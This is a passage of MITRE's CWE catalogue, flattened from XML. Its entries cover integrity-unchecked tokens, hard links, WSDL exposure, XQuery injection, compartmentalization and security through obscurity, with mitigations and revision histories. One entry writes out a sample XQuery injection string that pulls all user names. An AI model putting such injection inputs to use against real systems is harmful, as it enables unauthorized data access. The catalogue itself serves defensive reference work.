https://www.cve.org/CVERecord?id=CVE-2003-0645 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Name, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Improper Use of Privileged APIs + + + + The product uses obfuscation or encryption of inputs that should not be mutable by an external actor, but the product does not use integrity checks to detect if those inputs have been modified. + When an application relies on obfuscation or incorrectly applied / weak encryption to protect client-controllable tokens or parameters, that may have an effect on the user state, system state, or some decision made on the server. Without protecting the tokens/parameters for integrity, the application is vulnerable to an attack where an adversary traverses the space of possible values of the said token/parameter in order to attempt to gain an advantage. The goal of the attacker is to find another admissible value that will somehow elevate their privileges in the system, disclose information or change the behavior of the system in some way beneficial to the attacker. If the application does not protect these critical tokens/parameters for integrity, it will not be able to determine that these values have been tampered with. Measures that are used to protect data for confidentiality should not be relied upon to provide the integrity service. + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + High + + + Integrity + Unexpected State + The inputs could be modified without detection, causing the product to have unexpected system state or make incorrect security decisions. + + + + + Architecture and Design + Protect important client controllable tokens/parameters for integrity using PKI methods (i.e. digital signatures) or other means, and checks for integrity on the server side. + + + Architecture and Design + Repeated requests from a particular user that include invalid values of tokens/parameters (those that should not be changed manually by users) should result in the user account lockout. + + + Architecture and Design + Client side tokens/parameters should not be such that it would be easy/predictable to guess another valid state. + + + Architecture and Design + Obfuscation should not be relied upon. If encryption is used, it needs to be properly applied (i.e. proven algorithm and implementation, use padding, use random initialization vector, user proper encryption mode). Even with proper encryption where the ciphertext does not leak information about the plaintext or reveal its structure, compromising integrity is possible (although less likely) without the provision of the integrity service. + + + + + CVE-2005-0039 + An IPSec configuration does not perform integrity checking of the IPSec packet as the result of either not configuring ESP properly to support the integrity service or using AH improperly. In either case, the security gateway receiving the IPSec packet would not validate the integrity of the packet to ensure that it was not changed. Thus if the packets were intercepted the attacker could undetectably change some of the bits in the packets. The meaningful bit flipping was possible due to the known weaknesses in the CBC encryption mode. Since the attacker knew the structure of the packet, they were able (in one variation of the attack) to use bit flipping to change the destination IP of the packet to the destination machine controlled by the attacker. And so the destination security gateway would decrypt the packet and then forward the plaintext to the machine controlled by the attacker. The attacker could then read the original message. For instance if VPN was used with the vulnerable IPSec configuration the attacker could read the victim's e-mail. This vulnerability demonstrates the need to enforce the integrity service properly when critical data could be modified by an attacker. This problem might have also been mitigated by using an encryption mode that is not susceptible to bit flipping attacks, but the preferred mechanism to address this problem still remains message verification for integrity. While this attack focuses on the network layer and requires an entity that controls part of the communication path such as a router, the situation is not much different at the software level, where an attacker can modify tokens/parameters used by the application. + https://www.cve.org/CVERecord?id=CVE-2005-0039 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Observed_Example + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences, Description, Enabling_Factors_for_Exploitation, Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Description + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Relying on Obfuscation or Encryption with no Integrity Checking to Protect User Controllable Parameters that are Used to Determine User or System State + + + + The product, when opening a file or directory, does not sufficiently handle when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files. + Failure for a system to check for hard links can result in vulnerability to different types of attacks. For example, an attacker can escalate their privileges if a file used by a privileged program is replaced with a hard link to a sensitive file (e.g. AUTOEXEC.BAT). When the process opens the file, the attacker can assume the privileges of that process, or prevent the program from accurately processing data. + + + + + + + + + + Implementation + + + Operation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Architecture and Design + Separation of Privilege + + Follow the principle of least privilege when assigning access rights to entities in a software system. + Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted. + + + + + + CVE-2002-0725 + File system allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file. + https://www.cve.org/CVERecord?id=CVE-2002-0725 + + + CVE-2003-0844 + Web server plugin allows local users to overwrite arbitrary files via a symlink attack on predictable temporary filenames. + https://www.cve.org/CVERecord?id=CVE-2003-0844 + + + + + Windows hard link + + + FIO05-C + Identify files using multiple file attributes + + + SFP18 + Link in resource name resolution + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The server contains a protection mechanism that assumes that any URI that is accessed using HTTP GET will not cause a state change to the associated resource. This might allow attackers to bypass intended access restrictions and conduct resource modification and deletion attacks, since some applications allow GET to modify state. + The HTTP GET method and some other methods are designed to retrieve resources and not to alter the state of the application or resources on the server side. Furthermore, the HTTP specification requires that GET requests (and other requests) should not have side effects. Believing that it will be enough to prevent unintended resource alterations, an application may disallow the HTTP requests to perform DELETE, PUT and POST operations on the resource representation. However, there is nothing in the HTTP protocol itself that actually prevents the HTTP GET method from performing more than just query of the data. Developers can easily code programs that accept a HTTP GET request that do in fact create, update or delete data on the server. For instance, it is a common practice with REST based Web Services to have HTTP GET requests modifying resources on the server side. However, whenever that happens, the access control needs to be properly enforced in the application. No assumptions should be made that only HTTP DELETE, PUT, POST, and other methods have the power to alter the representation of the resource being accessed in the request. + + + + + + + + + Architecture and Design + + + Implementation + + + Operation + + + High + + + Access Control + Gain Privileges or Assume Identity + An attacker could escalate privileges. + + + Integrity + Modify Application Data + An attacker could modify resources. + + + Confidentiality + Read Application Data + An attacker could obtain sensitive information. + + + + + System Configuration + Configure ACLs on the server side to ensure that proper level of access control is defined for each accessible resource representation. + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Enabling_Factors_for_Exploitation + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-03-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The Web services architecture may require exposing a Web Service Definition Language (WSDL) file that contains information on the publicly accessible services and how callers of these services should interact with them (e.g. what parameters they expect and what types they return). + + An information exposure may occur if any of the following apply: + + The WSDL file is accessible to a wider audience than intended. + The WSDL file contains information on the methods/services that should not be publicly accessible or information about deprecated methods. This problem is made more likely due to the WSDL often being automatically generated from the code. + Information in the WSDL file helps guess names/locations of methods/resources that should not be publicly accessible. + + + + + + + + + + + + Implementation + + + Operation + + + + + Confidentiality + Read Application Data + The attacker may find sensitive information located in the WSDL file. + + + + + Architecture and Design + Limit access to the WSDL file as much as possible. If services are provided only to a limited number of entities, it may be better to provide WSDL privately to each of these entities than to publish WSDL publicly. + + + Architecture and Design + Separation of Privilege + Make sure that WSDL does not describe methods that should not be publicly accessible. Make sure to protect service methods that should not be publicly accessible with access controls. + + + Architecture and Design + Do not use method names in WSDL that might help an adversary guess names of private methods/resources used by the service. + + + + + The WSDL for a service providing information on the best price of a certain item exposes the following method: float getBestPrice(String ItemID) An attacker might guess that there is a method setBestPrice (String ItemID, float Price) that is available and invoke that method to try and change the best price of a given item to their advantage. The attack may succeed if the attacker correctly guesses the name of the method, the method does not have proper access controls around it and the service itself has the functionality to update the best price of the item. + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Description, Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-09-27 + updated Description, Name + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Observed_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak through WSDL File + Information Exposure Through WSDL File + + + + The product uses external input to dynamically construct an XQuery expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query. + The net effect is that the attacker will have control over the information selected from the XML database and may use that ability to control application flow, modify logic, retrieve unauthorized data, or bypass important checks (e.g. authentication). + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Confidentiality + Read Application Data + An attacker might be able to read sensitive information from the XML database. + + + + + Implementation + Use parameterized queries. This will help ensure separation between data plane and control plane. + + + Implementation + Properly validate user input. Reject data where appropriate, filter where appropriate and escape where appropriate. Make sure input that will be used in XQL queries is safe in that context. + + + + + An attacker may pass XQuery expressions embedded in an otherwise standard XML document. The attacker tunnels through the application entry point to target the resource access layer. The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back. doc(accounts.xml)//user[name='*'] The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL. + + + + + 46 + XQuery Injection + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This weakness is similar to other weaknesses that enable injection style attacks, such as SQL injection, command injection and LDAP injection. The main difference is that the target of attack here is the XML database. + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unsafe Treatment of XQuery Input + Failure to Sanitize Data within XQuery Expressions (aka 'XQuery Injection') + Failure to Sanitize Data within XQuery Expressions ('XQuery Injection') + + + + The product does not properly compartmentalize or isolate functionality, processes, or resources that require different privilege levels, rights, or permissions. + When a weakness occurs in functionality that is accessible by lower-privileged users, then without strong boundaries, an attack might extend the scope of the damage to higher-privileged users. + + + + + + + Primary + + + + + + + + Separation of Privilege + Some people and publications use the term "Separation of Privilege" to describe this weakness, but this term has dual meanings in current usage. This node conflicts with the original definition of "Separation of Privilege" by Saltzer and Schroeder; that original definition is more closely associated with CWE-654. Because there are multiple interpretations, use of the "Separation of Privilege" term is discouraged. + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + + + + + Access Control + Gain Privileges or Assume Identity + Bypass Protection Mechanism + The exploitation of a weakness in low-privileged areas of the software can be leveraged to reach higher-privileged areas without having to overcome any additional obstacles. + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Compare binary / bytecode to application permission manifest + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Attack Modeling + + + + High + + + + + Architecture and Design + Break up privileges between different modules, objects, or entities. Minimize the interfaces between modules and require strong access control between them. + + + + + Single sign-on technology is intended to make it easier for users to access multiple resources or domains without having to authenticate each time. While this is highly convenient for the user and attempts to address problems with psychological acceptability, it also means that a compromise of a user's credentials can provide immediate access to all other resources or domains. + + + The traditional UNIX privilege model provides root with arbitrary access to all resources, but root is frequently the only user that has privileges. As a result, administrative tasks require root privileges, even if those tasks are limited to a small area, such as updating user manpages. Some UNIX flavors have a "bin" user that is the owner of system executables, but since root relies on executables owned by bin, a compromise of the bin account can be leveraged for root privileges by modifying a bin-owned executable, such as CVE-2007-4238. + + + + + CVE-2019-6260 + Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC's physical address space from the host, and possibly the network [REF-1138]. + https://www.cve.org/CVERecord?id=CVE-2019-6260 + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + There is a close association with CWE-250 (Execution with Unnecessary Privileges). CWE-653 is about providing separate components for each "privilege"; CWE-250 is about ensuring that each component has the least amount of privileges possible. In this fashion, compartmentalization becomes one mechanism for reducing privileges. + The term "Separation of Privilege" is used in several different ways in the industry, but they generally combine two closely related principles: compartmentalization (this node) and using only one factor in a security decision (CWE-654). Proper compartmentalization implicitly introduces multiple factors into a security decision, but there can be cases in which multiple factors are required for authentication or other mechanisms that do not involve compartmentalization, such as performing all required checks on a submitted certificate. It is likely that CWE-653 and CWE-654 will provoke further discussion. + + + + Pascal Meunier + Purdue University + 2008-01-18 + Draft 8 + 2008-01-30 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Common_Consequences, Description, Relationships, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Name + + + CWE Content Team + MITRE + 2010-12-13 + updated Other_Notes, Relationship_Notes, Terminology_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Description, Name, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Design Principle Violation: Insufficient Compartmentalization + Insufficient Compartmentalization + + + + A protection mechanism relies exclusively, or to a large extent, on the evaluation of a single condition or the integrity of a single object or entity in order to make a decision about granting access to restricted resources or functionality. + + + + + + + Primary + + + + + + + + Separation of Privilege + Some people and publications use the term "Separation of Privilege" to describe this weakness, but this term has dual meanings in current usage. While this entry is closely associated with the original definition of "Separation of Privilege" by Saltzer and Schroeder, others use the same term to describe poor compartmentalization (CWE-653). Because there are multiple interpretations, use of the "Separation of Privilege" term is discouraged. + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Access Control + Gain Privileges or Assume Identity + If the single factor is compromised (e.g. by theft or spoofing), then the integrity of the entire security mechanism can be violated with respect to the user that is identified by that factor. + + + Non-Repudiation + Hide Activities + It can become difficult or impossible for the product to be able to distinguish between legitimate activities by the entity who provided the factor, versus illegitimate activities by an attacker. + + + + + Architecture and Design + Use multiple simultaneous checks before granting access to critical operations or granting critical privileges. A weaker but helpful mitigation is to use several successive checks (multiple layers of security). + + + Architecture and Design + Use redundant access rules on different choke points (e.g., firewalls). + + + + + Password-only authentication is perhaps the most well-known example of use of a single factor. Anybody who knows a user's password can impersonate that user. + + + When authenticating, use multiple factors, such as "something you know" (such as a password) and "something you have" (such as a hardware-based one-time password generator, or a biometric device). + + + + + Part 4-1 + Req SD-3 + + + Part 4-1 + Req SD-4 + + + Part 4-1 + Req SI-1 + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is closely associated with the term "Separation of Privilege." This term is used in several different ways in the industry, but they generally combine two closely related principles: compartmentalization (CWE-653) and using only one factor in a security decision (this entry). Proper compartmentalization implicitly introduces multiple factors into a security decision, but there can be cases in which multiple factors are required for authentication or other mechanisms that do not involve compartmentalization, such as performing all required checks on a submitted certificate. It is likely that CWE-653 and CWE-654 will provoke further discussion. + + + + Pascal Meunier + Purdue University + 2008-01-18 + Draft 8 + 2008-01-30 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Common_Consequences, Relationships, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Description, Name + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Maintenance_Notes, Other_Notes + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Alternate_Terms, Maintenance_Notes + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + Design Principle Violation: Reliance on a Single Factor in a Security Decision + + + + The product has a protection mechanism that is too difficult or inconvenient to use, encouraging non-malicious users to disable or bypass the mechanism, whether by accident or on purpose. + + + + + + + Primary + + + + + + + + Architecture and Design + + + + + Access Control + Bypass Protection Mechanism + By bypassing the security mechanism, a user might leave the system in a less secure state than intended by the administrator, making it more susceptible to compromise. + + + + + Testing + Where possible, perform human factors and usability studies to identify where your product's security mechanisms are difficult to use, and why. + + + Architecture and Design + Make the security mechanism as seamless as possible, while also providing the user with sufficient details when a security decision produces unexpected results. + + + + + In "Usability of Security: A Case Study" [REF-540], the authors consider human factors in a cryptography product. Some of the weakness relevant discoveries of this case study were: users accidentally leaked sensitive information, could not figure out how to perform some tasks, thought they were enabling a security option when they were not, and made improper trust decisions. + + + Enforcing complex and difficult-to-remember passwords that need to be frequently changed for access to trivial resources, e.g., to use a black-and-white printer. Complex password requirements can also cause users to store the passwords in an unsafe manner so they don't have to remember them, such as using a sticky note or saving them in an unencrypted file. + + + Some CAPTCHA utilities produce images that are too difficult for a human to read, causing user frustration. + + + + + Part 2-1 + Req 4.3.3.6 + + + Part 4-1 + Req SD-4 + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This weakness covers many security measures causing user inconvenience, requiring effort or causing frustration, that are disproportionate to the risks or value of the protected assets, or that are perceived to be ineffective. + The Taxonomy_Mappings to ISA/IEC 62443 were added in CWE 4.10, but they are still under review and might change in future CWE versions. These draft mappings were performed by members of the "Mapping CWE to 62443" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG), and their work is incomplete as of CWE 4.10. The mappings are included to facilitate discussion and review by the broader ICS/OT community, and they are likely to change in future CWE versions. + + + + Pascal Meunier + Purdue University + 2008-01-18 + Draft 8 + 2008-01-30 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Description, Name + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Nicolai Plum + 2022-07-16 + Provided new links for a reference that improved multiple CWEs. + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-01-24 + 4.10 + 2023-01-31 + Suggested mappings to ISA/IEC 62443. + + Design Principle Violation: Failure to Satisfy Psychological Acceptability + Failure to Satisfy Psychological Acceptability + + + + The product uses a protection mechanism whose strength depends heavily on its obscurity, such that knowledge of its algorithms or key data is sufficient to defeat the mechanism. + This reliance on "security through obscurity" can produce resultant weaknesses if an attacker is able to reverse engineer the inner workings of the mechanism. Note that obscurity can be one small part of defense in depth, since it can create more work for an attacker; however, it is a significant risk if used as the primary means of protection. + + + + + + + + + + Primary + + + + + + + + Never Assuming your secrets are safe + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Integrity + Availability + Other + Other + The security mechanism can be bypassed easily. + + + + + Architecture and Design + Always consider whether knowledge of your code or design is sufficient to break it. Reverse engineering is a highly successful discipline, and financially feasible for motivated adversaries. Black-box techniques are established for binary analysis of executables that use obfuscation, runtime analysis of proprietary protocols, inferring file formats, and others. + + + Architecture and Design + When available, use publicly-vetted algorithms and procedures, as these are more likely to undergo more extensive security analysis and testing. This is especially the case with encryption and authentication. + + + + + The design of TCP relies on the secrecy of Initial Sequence Numbers (ISNs), as originally covered in CVE-1999-0077 [REF-542]. If ISNs can be guessed (due to predictability, CWE-330) or sniffed (due to lack of encryption during transmission, CWE-312), then an attacker can hijack or spoof connections. Many TCP implementations have had variations of this problem over the years, including CVE-2004-0641, CVE-2002-1463, CVE-2001-0751, CVE-2001-0328, CVE-2001-0288, CVE-2001-0163, CVE-2001-0162, CVE-2000-0916, and CVE-2000-0328. + + + + + + + + CVE-2006-6588 + Reliance on hidden form fields in a web application. Many web application vulnerabilities exist because the developer did not consider that 